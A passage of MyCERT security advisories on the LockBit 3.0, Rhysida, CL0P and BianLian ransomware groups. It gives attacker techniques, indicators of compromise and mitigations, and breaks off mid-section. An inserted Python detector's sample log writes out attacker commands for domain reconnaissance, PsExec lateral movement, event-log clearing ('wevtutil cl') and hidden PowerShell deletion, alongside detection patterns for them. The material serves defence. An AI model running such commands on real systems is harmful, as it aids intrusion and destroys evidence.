MA-993.112023: MyCERT Alert - Cyber Security Best Practices against Ransomware LockBit 3.0

  • 29 Nov 2023
  • Alert
  • lockbit, ransomware

1.0 Introduction

The Cyber999 Incident Response Centre has observed an increase in ransomware-related attacks, including attacks executed by the well-identified ransomware known as LockBit 3.0. Lately, we have been receiving incident reports from a number of organisations in Malaysia hit by the LockBit 3.0 ransomware. Hence, this advisory is released to alert organisations and advise them on the preventive and mitigating measures to apply if they are targeted or fall victim.

LockBit 3.0 operates as an affiliate-based Ransomware-as-a-Service (RaaS) and employs a wide variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defence and mitigation. LockBit 3.0 ransomware compromises victim networks through a variety of techniques, including, but not limited to, purchased access, unpatched vulnerabilities, insider access, and zero-day exploits. The attackers associated with LockBit 3.0 are believed to originate from Russia. According to detailed analysis, the ransomware checks the default system language and avoids encryption, stopping the attack, if the victim system’s language is Russian or that of a country neighbouring Russia.

We have previously released an advisory on LockBit 3.0 ransomware, available at:

https://www.mycert.org.my/portal/advisory?id=MA-907.012023

Additionally, security researchers and security organisations recently reported that the LockBit 3.0 ransomware group was observed exploiting a critical unpatched Citrix NetScaler ADC and NetScaler Gateway vulnerability, CVE-2023-4966, referred to as "Citrix Bleed," increasing the urgency for enterprises to patch. Citrix Bleed was disclosed on October 10, 2023, as a critical security issue that affects Citrix NetScaler ADC and Gateway, enabling unauthorised access to sensitive device information.

A joint advisory by CISA, FBI, MS-ISAC, and ASD’s ACSC was released on LockBit affiliates exploiting Citrix Bleed, available at:

https://www.cisa.gov/news-events/alerts/2023/11/21/cisa-fbi-ms-isac-and-asds-acsc-release-advisory-lockbit-affiliates-exploiting-citrix-bleed

2.0 Impact
The impacts of LockBit 3.0 are:

  • Operations disruption with essential functions coming to a sudden halt.
  • Extortion by the hackers for financial gain.
  • Data theft and illegal publication as blackmail if the victim does not comply. 

3.0 Recommendations
MyCERT recommends network defenders apply the following mitigations to reduce the risk of compromise by LockBit 3.0 ransomware:

1) Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to have strong, unique passwords. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access. 

Note: Devices with local administrative accounts should implement a password policy requiring strong, unique passwords for each administrative account.

2) Require multi-factor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.

3) Keep all operating systems and software up to date. Prioritize patching known exploited vulnerabilities. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.

4) Apply security updates released by Citrix to address CVE-2023-4966 in NetScaler ADC and NetScaler Gateway.

https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967

5) Remove unnecessary access to administrative shares, especially ADMIN$ and C$. If ADMIN$ and C$ are deemed operationally necessary, restrict access to only the necessary service or user accounts and perform continuous monitoring for anomalous activity.

6) Use a host-based firewall to only allow connections to administrative shares via server message block (SMB) from a limited set of administrator machines.

7) Enable protected files in the Windows Operating System to prevent unauthorized changes to critical files.

8) Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.

9) Maintain offline backups of data, and regularly maintain backup and restoration procedures. This practice ensures that the organisation will not be severely interrupted or left with only irretrievable data.

Generally, MyCERT advises the users of these devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours)  
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

MA-989.112023: MyCERT Alert - CISA, FBI, and MS-ISAC Release Advisory on Rhysida Ransomware

  • 21 Nov 2023
  • Alert
  • rhysida, ransomware

1.0 Introduction

Recently, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released a joint Cybersecurity Advisory (CSA), #StopRansomware: Rhysida Ransomware, to disseminate known Rhysida ransomware indicators of compromise (IOCs), detection methods, and tactics, techniques, and procedures (TTPs) identified through investigations as recently as September 2023.

Observed as a ransomware-as-a-service (RaaS) model, Rhysida actors have compromised organizations in education, manufacturing, information technology, and government sectors and any ransom paid is split between the group and affiliates. Rhysida actors leverage external-facing remote services, such as virtual private networks (VPNs), Zerologon vulnerability (CVE-2020-1472), and phishing campaigns to gain initial access and persistence within a network.

2.0 Impact
Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. Open source reporting details similarities between Vice Society (DEV-0832)[1] activity and the actors observed deploying Rhysida ransomware. Additionally, open source reporting[2] has confirmed observed instances of Rhysida actors operating in a ransomware-as-a-service (RaaS) capacity, where ransomware tools and infrastructure are leased out in a profit-sharing model. Any ransoms paid are then split between the group and the affiliates.

For additional information on Vice Society actors and associated activity, see the joint CSA #StopRansomware: Vice Society.

3.0 Technical Details

3.1 Tactics, Techniques and Procedures (TTPs)
3.1.1 Initial Access

Rhysida actors have been observed leveraging external-facing remote services to initially access and persist within a network. Remote services, such as virtual private networks (VPNs), allow users to connect to internal enterprise network resources from external locations. Rhysida actors have commonly been observed authenticating to internal VPN access points with compromised valid credentials [T1078], notably due to organizations lacking MFA enabled by default. Additionally, actors have been observed exploiting Zerologon (CVE-2020-1472)—a critical elevation of privileges vulnerability in Microsoft’s Netlogon Remote Protocol [T1190]—as well as conducting successful phishing attempts [T1566]. Note: Microsoft released a patch for CVE-2020-1472 on August 11, 2020.[3]

3.1.2 Living off the Land

Analysis identified Rhysida actors using living off the land techniques, such as creating Remote Desktop Protocol (RDP) connections for lateral movement [T1021.001], establishing VPN access, and utilizing PowerShell [T1059.001]. Living off the land techniques include using native (built into the operating system) network administration tools to perform operations. This allows the actors to evade detection by blending in with normal Windows systems and network activities.

Ipconfig [T1016], whoami [T1033], nltest [T1482], and several net commands have been used to enumerate victim environments and gather information about domains. In one instance of using compromised credentials, actors leveraged net commands within PowerShell to identify logged-in users and performed reconnaissance on network accounts within the victim environment. Note: The following commands were not performed in the exact order listed.

  • net user [username] /domain [T1087.002]
  • net group “domain computers” /domain [T1018]
  • net group “domain admins” /domain [T1069.002]
  • net localgroup administrators [T1069.001]

Analysis of the master file table (MFT)[4] identified the victim system generated the ntuser.dat registry hive, which was created when the compromised user logged in to the system for the first time. This was considered anomalous due to the baseline of normal activity for that particular user and system. Note: The MFT resides within the New Technology File System (NTFS) and houses information about a file including its size, time and date stamps, permissions, and data content.

3.1.3 Leveraged Tools

Table 1 lists legitimate tools Rhysida actors have repurposed for their operations. The legitimate tools listed in this joint CSA are all publicly available. Use of these tools should not be attributed as malicious without analytical evidence to support they are used at the direction of or controlled by threat actors.

Disclaimer: Organizations are encouraged to investigate and vet use of these tools prior to performing remediation actions.

Table 1: Legitimate tools repurposed by Rhysida actors

Name | Description
cmd.exe | The native command line prompt utility.
PowerShell.exe | A native command line tool used to start a Windows PowerShell session in a Command Prompt window.
PsExec.exe | A tool included in the PsTools suite used to execute processes remotely. Rhysida actors heavily leveraged this tool for lateral movement and remote execution.
mstsc.exe | A native tool that establishes an RDP connection to a host.
PuTTY.exe | Rhysida actors have been observed creating Secure Shell (SSH) PuTTY connections for lateral movement. In one example, analysis of PowerShell console host history for a compromised user account revealed Rhysida actors leveraged PuTTY to remotely connect to systems via SSH [T1021.004].
PortStarter | A backdoor script written in Go that provides functionality for modifying firewall settings and opening ports to pre-configured command and control (C2) servers.[1]
secretsdump | A script used to extract credentials and other confidential information from a system. Rhysida actors have been observed using this for NTDS dumping [T1003.003] in various instances.
ntdsutil.exe | A standard Windows tool used to interact with the NTDS database. Rhysida actors used this tool to extract and dump the NTDS.dit database from the domain controller containing hashes for all Active Directory (AD) users. Note: It is strongly recommended that organizations conduct domain-wide password resets and double Kerberos TGT password resets if any indication is found that the NTDS.dit file was compromised.
AnyDesk | A common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer.
wevtutil.exe | A standard Windows Event Utility tool used to view event logs. Rhysida actors used this tool to clear a significant number of Windows event logs, including system, application, and security logs [T1070.001].
PowerView | A PowerShell tool used to gain situational awareness of Windows domains. Review of PowerShell event logs identified Rhysida actors using this tool to conduct additional reconnaissance-based commands and harvest credentials.

3.2 Rhysida Ransomware Characteristics

3.2.1 Execution

In one investigation, Rhysida actors created two folders in the C:\ drive labeled in and out, which served as a staging directory (central location) for hosting malicious executables. The in folder contained file names in accordance with host names on the victim’s network, likely imported through a scanning tool. The out folder contained various files listed in Table 2 below. Rhysida actors deployed these tools and scripts to assist system and network-wide encryption.

Table 2: Files staged in the out folder

File Name | Hash (SHA256) | Description
conhost.exe | 6633fa85bb234a75927b23417313e51a4c155e12f71da3959e168851a600b010 | A ransomware binary.
psexec.exe | 078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b | A file used to execute a process on a remote or local host.
S_0.bat | 1c4978cd5d750a2985da9b58db137fc74d28422f1e087fd77642faa7efe7b597 | A batch script likely used to place 1.ps1 on victim systems for ransomware staging purposes [T1059.003].
1.ps1 | 4e34b9442f825a16d7f6557193426ae7a18899ed46d3b896f6e4357367276183 | Identifies an extension block list of files to encrypt and not encrypt.
S_1.bat | 97766464d0f2f91b82b557ac656ab82e15cae7896b1d8c98632ca53c15cf06c4 | A batch script that copies conhost.exe (the encryption binary) to an imported list of host names, within the C:\Windows\Temp directory of each system.
S_2.bat | 918784e25bd24192ce4e999538be96898558660659e3c624a5f27857784cd7e1 | Executes conhost.exe on compromised victim systems, which encrypts files and appends the .Rhysida extension across the environment.
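As an added example (not code from the advisory, CISA or any referenced vendor), the following Python turns the tradecraft described in sections 3.1.2, 3.1.3 and 3.2.1 into detection logic and runs it over constructed process-creation events: the log format, field names, hostnames, user names and sample command lines are all assumptions made for the illustration.

```python
"""Detection logic for the Rhysida tradecraft described in this advisory.

Added example, not part of the advisory or of any vendor product. It flags:
  - domain reconnaissance: several distinct net/nltest/whoami/ipconfig
    commands from one host and account (section 3.1.2),
  - wevtutil log clearing and PsExec execution (Table 1),
  - a binary named conhost.exe running outside System32, which is how the
    encryptor was staged under C:\\Windows\\Temp (Table 2), and
  - PowerShell launched with a hidden window (section 3.2.2).
The log format below is constructed for the example: one process-creation
event per line, "timestamp|host|user|image_path|command_line". In practice
the same fields come from Windows Event ID 4688 (with command-line auditing
enabled) or Sysmon Event ID 1.
"""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass

# Constructed sample log (not real telemetry). Raw string, so single
# backslashes are literal.
SAMPLE_LOG = r"""
2023-09-10T02:11:05|WS01|CORP\jsmith|C:\Windows\System32\whoami.exe|whoami
2023-09-10T02:11:09|WS01|CORP\jsmith|C:\Windows\System32\net.exe|net user jsmith /domain
2023-09-10T02:11:14|WS01|CORP\jsmith|C:\Windows\System32\net.exe|net group "domain admins" /domain
2023-09-10T02:11:20|WS01|CORP\jsmith|C:\Windows\System32\nltest.exe|nltest /domain_trusts
2023-09-10T02:12:01|WS01|CORP\jsmith|C:\Windows\System32\net.exe|net localgroup administrators
2023-09-10T02:30:44|WS01|CORP\jsmith|C:\Windows\Temp\psexec.exe|psexec.exe \\SRV02 -s cmd.exe
2023-09-10T02:31:02|SRV02|NT AUTHORITY\SYSTEM|C:\Windows\Temp\conhost.exe|conhost.exe -d C:\Users
2023-09-10T02:31:03|SRV02|NT AUTHORITY\SYSTEM|C:\Windows\System32\conhost.exe|conhost.exe 0x4
2023-09-10T02:35:10|SRV02|NT AUTHORITY\SYSTEM|C:\Windows\System32\wevtutil.exe|wevtutil cl Security
2023-09-10T02:35:11|SRV02|NT AUTHORITY\SYSTEM|C:\Windows\System32\wevtutil.exe|wevtutil cl System
2023-09-10T02:35:30|SRV02|NT AUTHORITY\SYSTEM|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden Remove-Item C:\Windows\Temp\conhost.exe
2023-09-10T08:00:00|WS07|CORP\helpdesk|C:\Windows\System32\net.exe|net user bob /domain
""".strip()


@dataclass(frozen=True)
class Event:
    ts: str
    host: str
    user: str
    image: str
    cmdline: str


def parse_log(text: str) -> list[Event]:
    """Parse the constructed pipe-separated format (command line is the last field)."""
    return [Event(*line.split("|", 4)) for line in text.splitlines() if line.strip()]


# Enumeration commands listed in section 3.1.2 (net user/group/localgroup, nltest, whoami, ipconfig).
RECON = re.compile(r"^(?:whoami|ipconfig|nltest|net1?\s+(?:user|group|localgroup))\b", re.I)
# wevtutil clearing event logs [T1070.001].
LOG_CLEAR = re.compile(r"^wevtutil(?:\.exe)?\s+(?:cl|clear-log)\b", re.I)
# PowerShell started with a hidden window [T1564.003].
HIDDEN_PS = re.compile(r"powershell.*\s-(?:w|windowstyle)\s+hidden\b", re.I)
# PsExec client or its service image, wherever it was dropped.
PSEXEC_IMAGE = re.compile(r"\\(?:psexec(?:64)?|psexesvc)\.exe$", re.I)
SYSTEM32 = "c:\\windows\\system32\\"


def detect(events: list[Event], recon_threshold: int = 3) -> list[dict]:
    """Return one finding per matching event, plus one per (host, user) that ran
    at least recon_threshold distinct reconnaissance commands."""
    findings: list[dict] = []
    recon_seen: dict[tuple[str, str], set[str]] = defaultdict(set)

    def flag(kind: str, e: Event) -> None:
        findings.append({"type": kind, "ts": e.ts, "host": e.host, "user": e.user, "cmdline": e.cmdline})

    for e in events:
        m = RECON.match(e.cmdline)
        if m:
            # Normalise "net   group" -> "net group" so spacing variants count once.
            recon_seen[(e.host, e.user)].add(" ".join(m.group(0).split()).lower())
        if LOG_CLEAR.match(e.cmdline):
            flag("log_clearing", e)
        if PSEXEC_IMAGE.search(e.image):
            flag("psexec_execution", e)
        # The real conhost.exe lives in System32; a copy elsewhere is the staged encryptor.
        if e.image.rsplit("\\", 1)[-1].lower() == "conhost.exe" and not e.image.lower().startswith(SYSTEM32):
            flag("masqueraded_conhost", e)
        if HIDDEN_PS.search(e.cmdline):
            flag("hidden_powershell", e)

    for (host, user), cmds in recon_seen.items():
        if len(cmds) >= recon_threshold:
            findings.append({"type": "domain_reconnaissance", "host": host, "user": user,
                             "cmdline": ", ".join(sorted(cmds))})
    return findings


def summarize(findings: list[dict]) -> dict[str, int]:
    """Count findings by type, e.g. {'log_clearing': 2, ...}."""
    return dict(Counter(f["type"] for f in findings))


if __name__ == "__main__":
    for finding in detect(parse_log(SAMPLE_LOG)):
        print(finding)
```

The single benign `net user` from the helpdesk host stays below the reconnaissance threshold, while the legitimate System32 conhost.exe is not flagged; tune the threshold and the image allow-list to your own baseline.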

Rhysida ransomware uses a Windows 64-bit Portable Executable (PE) or common object file format (COFF) compiled using MinGW via the GNU Compiler Collection (GCC), which supports various programming languages such as C, C++, and Go. The cryptographic ransomware application first injects the PE into running processes on the compromised system [T1055.002]. Additionally, third-party researchers identified evidence of Rhysida actors developing custom tools with program names set to “Rhysida-0.1” [T1587].

3.2.2 Encryption

After mapping the network, the ransomware encrypts data using a 4096-bit RSA encryption key with a ChaCha20 algorithm [T1486]. The algorithm features a 256-bit key, a 32-bit counter, and a 96-bit nonce along with a four-by-four matrix of 32-bit words in plain text. Registry modification commands [T1112] are not obfuscated, displayed as plain-text strings and executed via cmd.exe.

Rhysida’s encryptor runs a file to encrypt and modify all encrypted files to display a .rhysida extension.[5] Following encryption, a PowerShell command deletes the binary [T1070.004] from the network using a hidden command window [T1564.003]. The Rhysida encryptor allows arguments -d (select a directory) and -sr (file deletion), defined by the authors of the code as parseOptions.[6] After the lines of binary strings complete their tasks, they delete themselves through the control panel to evade detection.
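The cipher parameters stated above (256-bit key, 32-bit counter, 96-bit nonce, 4x4 matrix of 32-bit words) are those of the IETF ChaCha20 construction in RFC 7539. As an added illustration that is not Rhysida's code and not part of the advisory, the Python below builds that state matrix, generates keystream blocks, and enforces the counter limit the 32-bit counter size implies; it is checked against the RFC's block-function test vector. The RSA wrapping of the key is out of scope.

```python
"""ChaCha20 (IETF variant, RFC 7539) with the state layout described in
section 3.2.2. Added example, not code from the ransomware or the advisory.
"""
import struct

MASK32 = 0xFFFFFFFF
# Row 0 of the matrix: the four constant words "expand 32-byte k".
CONSTANTS = struct.unpack("<4I", b"expand 32-byte k")


def rotl32(v: int, n: int) -> int:
    return ((v << n) & MASK32) | (v >> (32 - n))


def quarter_round(s: list, a: int, b: int, c: int, d: int) -> None:
    """In-place ChaCha quarter round on four words of the 16-word state."""
    s[a] = (s[a] + s[b]) & MASK32; s[d] = rotl32(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = rotl32(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK32; s[d] = rotl32(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = rotl32(s[b] ^ s[c], 7)


def initial_state(key: bytes, counter: int, nonce: bytes) -> list:
    """Build the 4x4 matrix of 32-bit words: row 0 constants, rows 1-2 the
    256-bit key, row 3 the 32-bit block counter followed by the 96-bit nonce."""
    if len(key) != 32:
        raise ValueError("ChaCha20 key must be 256 bits")
    if len(nonce) != 12:
        raise ValueError("IETF ChaCha20 nonce must be 96 bits")
    if not 0 <= counter <= MASK32:
        raise ValueError("block counter is a single 32-bit word")
    return (list(CONSTANTS) + list(struct.unpack("<8I", key))
            + [counter] + list(struct.unpack("<3I", nonce)))


def chacha20_block(key: bytes, counter: int, nonce: bytes) -> bytes:
    """One 64-byte keystream block: 10 double rounds (columns, then diagonals),
    then the input state is added back word by word."""
    state = initial_state(key, counter, nonce)
    w = state.copy()
    for _ in range(10):
        quarter_round(w, 0, 4, 8, 12)
        quarter_round(w, 1, 5, 9, 13)
        quarter_round(w, 2, 6, 10, 14)
        quarter_round(w, 3, 7, 11, 15)
        quarter_round(w, 0, 5, 10, 15)
        quarter_round(w, 1, 6, 11, 12)
        quarter_round(w, 2, 7, 8, 13)
        quarter_round(w, 3, 4, 9, 14)
    return struct.pack("<16I", *((w[i] + state[i]) & MASK32 for i in range(16)))


def chacha20_xor(key: bytes, counter: int, nonce: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (the same XOR operation). Refuses to wrap the 32-bit
    counter, which would reuse keystream: one (key, nonce) pair covers at most
    2**32 blocks, i.e. 256 GiB."""
    nblocks = (len(data) + 63) // 64
    if counter + nblocks > MASK32 + 1:
        raise ValueError("message would exhaust the 32-bit block counter")
    out = bytearray()
    for i in range(nblocks):
        keystream = chacha20_block(key, counter + i, nonce)
        chunk = data[i * 64:(i + 1) * 64]
        out += bytes(p ^ k for p, k in zip(chunk, keystream))
    return bytes(out)


if __name__ == "__main__":
    # RFC 7539 section 2.3.2 inputs: key 00..1f, counter 1, nonce 00:00:00:09:00:00:00:4a:00:00:00:00.
    key = bytes(range(32))
    nonce = bytes.fromhex("000000090000004a00000000")
    print(chacha20_block(key, 1, nonce).hex())
```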

3.2.3 Data Extortion

Rhysida actors reportedly engage in “double extortion” [T1657]—demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid.[5],[7] Rhysida actors direct victims to send ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. As shown in Figure 1, Rhysida ransomware drops a ransom note named “CriticalBreachDetected” as a PDF file—the note provides each company with a unique code and instructions to contact the group via a Tor-based portal.

Figure 1: Rhysida Ransom Note

Identified in analysis and also listed in open source reporting, the contents of the ransom note are embedded as plain-text in the ransom binary, offering network defenders an opportunity to deploy string-based detection for alerting on evidence of the ransom note. Rhysida threat actors may target systems that do not use command-line operating systems. The format of the PDF ransom notes could indicate that Rhysida actors only target systems that are compatible with handling PDF documents.[8]

3.3 Indicators of Compromise (IOCs)

On November 10, 2023, Sophos published TTPs and IOCs identified from analysis conducted for six separate incidents.[9] The C2 IP addresses listed in Table 3 were derived directly from Sophos’ investigations and are listed on GitHub among other indicators.[10]


Additional IOCs were obtained from FBI, CISA, and the MS-ISAC’s investigations and analysis. The email addresses listed in Table 4 are associated with Rhysida actors’ operations. Rhysida actors have been observed creating Onion Mail email accounts for services or victim communication, commonly in the format: [First Name][Last Name]@onionmail[.]org.

Email Address
rhysidaeverywhere@onionmail[.]org
rhysidaofficial@onionmail[.]org

Rhysida actors have also been observed using the following files and executables listed in Table 5 to support their operations.

Disclaimer: Organizations are encouraged to investigate the use of these files for related signs of compromise prior to performing remediation actions.

File Name | Hash (SHA256)
psexesvc.exe | This artifact is created when a user establishes a connection using PsExec. It is removed after the connection is terminated, which is why there is no hash available for this executable.

 

4.0 Recommendations
MyCERT recommends that system administrators review this advisory and apply the mitigations recommended below to reduce the likelihood and impact of Rhysida and other ransomware incidents.

  1. Prioritize remediating known exploited vulnerabilities.
  2. Enable multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, VPN, and accounts that access critical systems.
  3. Segment networks to prevent the spread of ransomware.

Generally, MyCERT advises the users of these devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours)  
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

5.0    References

  1. Microsoft: DEV-0832 (Vice Society) Opportunistic Ransomware Campaigns Impacting US Education Sector
  2. FortiGuard Labs: Ransomware Roundup - Rhysida
  3. Microsoft: Security Update Guide - CVE-2020-1472
  4. Microsoft: Master File Table (Local File Systems)
  5. SentinelOne: Rhysida
  6. Secplicity: Scratching the Surface of Rhysida Ransomware
  7. Cisco Talos: What Cisco Talos Knows about the Rhysida Ransomware
  8. SOC Radar: Rhysida Ransomware Threat Profile
  9. Sophos: A Threat Cluster’s Switch from Vice Society to Rhysida
  10. Sophos: Vice Society - Rhysida IOCs (GitHub)
  11. Check Point Research: Rhysida Ransomware - Activity and Ties to Vice Society
  12. Microsoft: Command Line Process Auditing
  13. Microsoft: Audit Process Tracking
  14. Microsoft: Remote Credential Guard
  15. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a

MA-944.062023: MyCERT Advisory - CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability

  • 15 Jun 2023
  • Advisory
  • cl0p, ransomware, moveit, vulnerability

1.0 Introduction

Open-source data indicates that on May 27, 2023, the CL0P Ransomware Gang, also known as TA505, started exploiting a previously unreported SQL injection vulnerability (CVE-2023-34362) in Progress Software’s managed file transfer (MFT), MOVEit Transfer. 

A web shell called LEMURLOOT was used to infect publicly accessible MOVEit Transfer web applications and steal data from the underlying MOVEit Transfer databases. A similar flurry of activity was launched by TA505 in early 2023 targeting Fortra/Linoma GoAnywhere MFT servers and Accellion File Transfer Appliance (FTA) devices, in the form of zero-day exploit-driven attacks.

 

2.0 Impact

  • Retrieve Microsoft Azure system settings and enumerate the underlying SQL database.
  • Store a string sent by the operator and then retrieve a file with a name matching the string from the MOVEit Transfer system.
  • Create a new administrator privileged account with a randomly generated username and LoginName and RealName values set to “Health Check Service.”
  • Delete an account with LoginName and RealName values set to ‘Health Check Service.’

 

3.0 Affected Products

  • MOVEit Transfer 2023.0.0
  • MOVEit Transfer 2022.1.x
  • MOVEit Transfer 2022.0.x
  • MOVEit Transfer 2021.1.x
  • MOVEit Transfer 2021.0.x
  • MOVEit Transfer 2020.1.x
  • MOVEit Transfer 2020.0.x

 

4.0 Indicators of Compromise (IoCs)
4.1 MOVEit Campaign Indicators of Compromise

Files: LEMURLOOT web shell (e.g. human2.aspx)
SHA256 hashes:


 

4.2 GoAnywhere Campaign Indicators of Compromise

File | Hash (SHA256) | Description
larabqFa.exe, Qboxdv.dll | 0e3a14638456f4451fe8d76fdc04e591fba942c2f16da31857ca66293a58a4c3 | Truebot
%TMP%\7ZipSfx.000\Zoom.exe | 1285aa7e6ee729be808c46c069e30a9ee9ce34287151076ba81a0bea0508ff7e | Spawns a PowerShell subprocess which executes a malicious DLL file
%TMP%\7ZipSfx.000\ANetDiag.dll | 2c8d58f439c708c28ac4ad4a0e9f93046cf076fc6e5ab1088e8943c0909acbc4 | Obfuscated malware which also uses long sleeps and debug detection to evade analysis
AVICaptures.dll | a8569c78af187d603eecdc5faec860458919349eef51091893b705f466340ecd | Truebot
kpdphhajHbFerUr.exe, gamft.dll | c042ad2947caf4449295a51f9d640d722b5a6ec6957523ebf68cddb87ef3545c | Truebot
dnSjujahur.exe, Pxaz.dll | c9b874d54c18e895face055eeb6faa2da7965a336d70303d0bd6047bec27a29d | Truebot
7ZSfxMod_x86.exe, ZoomInstaller.exe, Zoom.exe | d5bbcaa0c3eeea17f12a5cc3dbcaffff423d00562acb694561841bcfe984a3b7 | Fake Zoom installer - Truebot
update.jsp | eb9f5cbe71f9658d38fb4a7aa101ad40534c4c93ee73ef5f6886d89159b0e2c2 | Java Server Pages (JSP) web shell with some base64 obfuscation
%TMP%\<folder>\extracted_at_0xe5c8f00.exe | f2f08e4f108aaffaadc3d11bad24abdd625a77e0ee9674c4541b562c78415765 | Employs sandbox detection and string obfuscation - appears to be a collection of C# hack tools
UhfdkUSwkFKedUUi.exe, gamft.dll | ff8c8c8bfba5f2ba2f8003255949678df209dbff95e16f2f3c338cfa0fd1b885 | Truebot

 

Email Address | Description
unlock@rsv-box[.]com | CL0P communication email
unlock@support-mult[.]com | CL0P communication email
rey14000707@gmail[.]com | Login/Download
gagnondani225@gmail[.]com | Email

 


 

Code-signing certificate

Certificate Name: Savas Investments PTY LTD
Status: Valid (Issuer: Sectigo Public Code Signing CA R36)
Date Valid: 10/7/2022 - 10/7/2023
Thumbprint: 8DCCF6AD21A58226521E36D7E5DBAD133331C181
Serial Number: 00-82-D2-24-32-3E-FA-65-06-0B-64-1F-51-FA-DF-EF-02

 

MOVEit Campaign Infrastructure IP Addresses (May/June 2023)
GoAnywhere Campaign Infrastructure IP Addresses (January/February 2023)


 

5.0 Recommendations
MyCERT recommends that users and administrators follow the security best practices below to improve their organization’s security posture.

  • Reduce threat of malicious actors using remote access tools by:
    • Auditing remote access tools.
    • Reviewing logs for execution of remote access software.
    • Using security software.
    • Requiring authorized remote access solutions.
    • Blocking both inbound and outbound connections.
  • Implement application controls.
  • Strictly limit the use of RDP and other remote desktop services.
  • Disable command-line and scripting.
  • Restrict the use of PowerShell.
  • Update Windows PowerShell or PowerShell Core.
  • Review domain controllers, servers, workstation, and active directories.
  • Audit user accounts with administrative privileges.
  • Reduce the threat of credential compromise.
  • Implement time-based access for accounts.

In addition, MyCERT recommend apply the following recommendation to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Implement a recovery plan.
  • Maintain offline backups of data.
  • Require multifactor authentication.
  • Keep all operating systems, software and firmware up to date.
  • Segment networks.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.
  • Install, regularly update, and enable real time detection for antivirus software.
  • Disable unused ports and hyperlinks.
  • Consider adding and email banner to emails.
  • Ensure all backup data is encrypted, immutable.

Generally, MyCERT advises the users of this devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours) 
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

 

6.0    References

MA-941.062023: MyCERT Advisory - BianLian Ransomware Group

  • 15 Jun 2023
  • Advisory
  • bianlian, ransomware

1.0 Introduction

Recently, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Cyber Security Centre (ACSC) released a joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations as of March 2023. 

BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development. The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian group actors then extort money by threatening to release data if payment is not made. BianLian group originally employed a double-extortion model in which they encrypted victims’ systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion.

2.0 Technical Details
BianLian is a ransomware developer, deployer, and data extortion cybercriminal group. FBI observed BianLian group targeting organizations in multiple U.S. critical infrastructure sectors since June 2022. In Australia, ACSC has observed BianLian group predominantly targeting private enterprises, including one critical infrastructure organization. BianLian group originally employed a double-extortion model in which they exfiltrated financial, client, business, technical, and personal files for leverage and encrypted victims' systems. In 2023, FBI observed BianLian shift to primarily exfiltration-based extortion with victims' systems left intact, and ACSC observed BianLian shift exclusively to exfiltration-based extortion. BianLian actors warn of financial, business, and legal ramifications if payment is not made.

2.1 Initial access
BianLian group actors gain initial access to networks by leveraging compromised Remote Desktop Protocol (RDP) credentials likely acquired from initial access brokers or via phishing.

2.2 Command and Control
BianLian group actors implant a custom backdoor specific to each victim written in Go (see the Indicators of Compromise Section for an example) and install remote management and access software—e.g., TeamViewer, Atera Agent, SplashTop, AnyDesk—for persistence and command and control.
FBI also observed BianLian group actors create and/or activate local administrator accounts and change those account passwords.

2.3 Defense Evasion
